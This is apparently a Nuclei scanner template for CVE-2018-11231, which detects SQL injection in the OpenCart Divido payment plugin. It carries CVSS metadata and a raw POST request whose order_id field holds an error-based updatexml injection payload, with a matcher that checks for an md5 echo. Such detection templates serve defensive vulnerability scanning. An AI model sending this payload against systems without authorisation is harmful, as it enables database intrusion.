nuclei-templates/cves/2018/CVE-2018-11231.yaml

45 lines
1003 B
YAML

id: CVE-2018-11231
info:
name: Opencart Divido - Sql Injection
author: ritikchaddha
severity: high
description: |
OpenCart Divido plugin is susceptible to SQL injection
reference:
- http://foreversong.cn/archives/1183
- https://nvd.nist.gov/vuln/detail/CVE-2018-11231
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 8.10
cve-id: CVE-2018-11231
cwe-id: CWE-89
tags: cve,cve2018,opencart,sqli
variables:
num: "999999999"
requests:
- raw:
- |
POST /upload/index.php?route=extension/payment/divido/update HTTP/1.1
Host: {{Hostname}}
{"metadata":{"order_id":"1 and updatexml(1,concat(0x7e,(SELECT md5({{num}})),0x7e),1)"},"status":2}
redirects: true
max-redirects: 2
matchers-condition: and
matchers:
- type: word
part: body
words:
- '{{md5({{num}})}}'
- type: status
status:
- 200
# Enhanced by mp on 2022/06/19